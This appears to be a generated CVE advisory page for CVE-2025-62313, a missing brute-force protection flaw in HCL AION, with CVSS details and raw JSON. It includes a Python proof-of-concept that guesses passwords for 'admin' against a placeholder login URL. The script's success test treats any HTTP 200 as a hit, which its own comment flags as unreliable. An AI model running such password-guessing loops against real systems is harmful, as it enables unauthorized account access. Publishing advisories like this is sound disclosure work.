Security Vulnerability Report
CVE-2025-62313 CVSS 5.4 MEDIUM

CVE-2025-62313

Published: 2026-05-14 17:16:19
Last Modified: 2026-05-14 17:22:47

Description

HCL AION is affected by a vulnerability where adequate protections against brute-force attempts are not enforced. This may allow repeated authentication attempts, potentially leading to unauthorized access or account compromise under certain conditions.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

HCL AION (for the specific affected versions, refer to the official HCL advisory KB0130636)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
    import requests

    # CVE-2025-62313 PoC: Brute Force Protection Bypass
    # Target: HCL AION
    # Description: This script demonstrates the lack of rate limiting on the login endpoint.

    TARGET_URL = "http://target-hcl-aion/login"
    USERNAME = "admin"
    PASSWORD_LIST = ["password", "123456", "admin", "root"]  # Example list


    def brute_force_login():
        session = requests.Session()
        for password in PASSWORD_LIST:
            payload = {"username": USERNAME, "password": password}
            try:
                response = session.post(TARGET_URL, data=payload, timeout=5)
                # Check for success indicators (e.g., status 200, specific text).
                # Note: many login forms also return HTTP 200 on a failed login,
                # so the status-code check alone can report a false positive.
                if "Login successful" in response.text or response.status_code == 200:
                    print(f"[+] Success! Password found: {password}")
                    return
                elif response.status_code == 429:
                    # HTTP 429 Too Many Requests indicates rate limiting is enforced
                    print("[-] Rate limit detected. Exploit failed.")
                    return
                else:
                    print(f"[-] Attempt with '{password}' failed. Status: {response.status_code}")
            except Exception as e:
                print(f"[-] Error: {e}")


    if __name__ == "__main__":
        brute_force_login()

References

https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0130636 (HCL advisory KB0130636)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-62313",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-14T17:16:18.660",
    "lastModified": "2026-05-14T17:22:46.577",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "HCL AION is affected by a vulnerability where adequate protections against brute-force attempts are not enforced. This may allow repeated authentication attempts, potentially leading to unauthorized access or account compromise under certain conditions."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L",
            "baseScore": 5.4,
            "baseSeverity": "MEDIUM",
            "attackVector": "ADJACENT_NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 2.5
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-307"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0130636",
        "source": "[email protected]"
      }
    ]
  }
}